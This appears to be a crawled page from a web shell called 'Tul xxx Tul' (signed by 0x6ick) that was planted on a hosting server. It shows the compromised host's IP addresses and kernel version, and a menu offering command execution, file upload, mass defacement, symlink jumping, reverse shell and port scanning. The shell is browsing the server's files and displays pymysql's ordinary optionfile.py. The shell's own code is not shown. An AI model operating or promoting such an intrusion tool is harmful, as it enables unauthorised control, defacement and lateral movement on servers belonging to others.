Tul xxx Tul
User / IP
:
216.73.217.33
Host / Server
:
45.84.207.204 / aircan.me
System
:
Linux lt-bnk-web1726.main-hosting.eu 5.14.0-611.36.1.el9_7.x86_64 #1 SMP PREEMPT_DYNAMIC Tue Mar 3 11:23:52 EST 2026 x86_64
Command
|
Upload
|
Create
Mass Deface
|
Jumping
|
Symlink
|
Reverse Shell
Ping
|
Port Scan
|
DNS Lookup
|
Whois
|
Header
|
cURL
:
/
lib
/
python3.9
/
site-packages
/
pymysql
/
Viewing: optionfile.py
from ._compat import PY2 if PY2: import ConfigParser as configparser else: import configparser class Parser(configparser.RawConfigParser): def __init__(self, **kwargs): kwargs['allow_no_value'] = True configparser.RawConfigParser.__init__(self, **kwargs) def __remove_quotes(self, value): quotes = ["'", "\""] for quote in quotes: if len(value) >= 2 and value[0] == value[-1] == quote: return value[1:-1] return value def get(self, section, option): value = configparser.RawConfigParser.get(self, section, option) return self.__remove_quotes(value)
Coded With 💗 by
0x6ick